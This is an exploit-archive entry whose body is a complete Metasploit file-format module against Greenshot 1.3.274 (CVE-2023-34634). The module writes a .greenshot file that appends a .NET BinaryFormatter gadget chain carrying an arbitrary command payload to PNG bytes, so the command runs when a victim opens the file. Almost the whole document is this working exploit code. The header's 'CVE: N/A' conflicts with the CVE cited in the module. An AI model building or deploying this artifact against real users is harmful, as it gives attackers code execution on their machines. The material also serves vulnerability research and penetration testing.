Greenshot 1.3.274 Deserialization / Command Execution

2023.08.19
Credit: bwatters-r7
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

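##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format module: writes a .greenshot file that carries a BinaryFormatter
# serialized gadget chain after the PNG image bytes. The generated artifact has
# a fixed, observable layout (PNG | serialized blob | 8-byte blob length |
# 'Greenshot01.02' trailer), which is what the output section below builds.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Post::File

  # Extension the generated artifact must carry to be treated as a Greenshot file.
  GREENSHOT_EXT = '.greenshot'

  # Trailer string appended after the 8-byte length field.
  GREENSHOT_MARKER = 'Greenshot01.02'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Greenshot .NET Deserialization Fileformat Exploit',
        'Description' => %q{
          There exists a .NET deserialization vulnerability in Greenshot version 1.3.274 and below.
          The deserialization allows the execution of commands when a user opens a Greenshot file.
          The commands execute under the same permissions as the Greenshot service. Typically, is
          the logged in user.
        },
        'DisclosureDate' => '2023-07-26',
        'Author' => [
          'p4r4bellum', # Discovery
          'bwatters-r7', # msf exploit
        ],
        'References' => [
          ['CVE', '2023-34634'],
          ['EDB', '51633']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'Targets' => [
          [ 'Windows', {} ],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
        }
      )
    )
    register_options([
      OptPath.new('PNG_FILE', [false, 'PNG file to use'])
    ])
  end

  # Builds the output file and hands it to FILEFORMAT's file_create, which
  # writes it under the FILENAME option.
  #
  # Fix over the previous revision: the extension check used
  # `datastore['FILENAME'][-10, -1]`, and String#[] with a negative length
  # always returns nil, so '.greenshot' was appended even when the name
  # already ended with it (yielding a doubled extension). end_with? is the
  # intended test. The extension is now set by assignment rather than by
  # mutating the datastore string in place, so a frozen value cannot raise.
  def exploit
    image_file = if datastore['PNG_FILE'].blank?
                   File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')
                 else
                   datastore['PNG_FILE']
                 end

    datastore['FILENAME'] = Rex::Text.rand_text_alpha(rand(6..13)) if datastore['FILENAME'].blank?
    unless datastore['FILENAME'].end_with?(GREENSHOT_EXT)
      datastore['FILENAME'] = "#{datastore['FILENAME']}#{GREENSHOT_EXT}"
    end

    cmd = payload.encoded
    deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :WindowsIdentity,
      formatter: :BinaryFormatter
    )

    # Output layout: PNG bytes | serialized blob | 8-byte blob length | marker.
    # The length field describes bytes, so bytesize is used (identical to
    # length for a binary-encoded string). 'Q' packs an unsigned 64-bit
    # integer in host-native byte order.
    outfile = File.binread(image_file)
    outfile << deserialize_cmd
    outfile << [deserialize_cmd.bytesize].pack('Q')
    outfile << GREENSHOT_MARKER
    file_create(outfile)
  end
end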

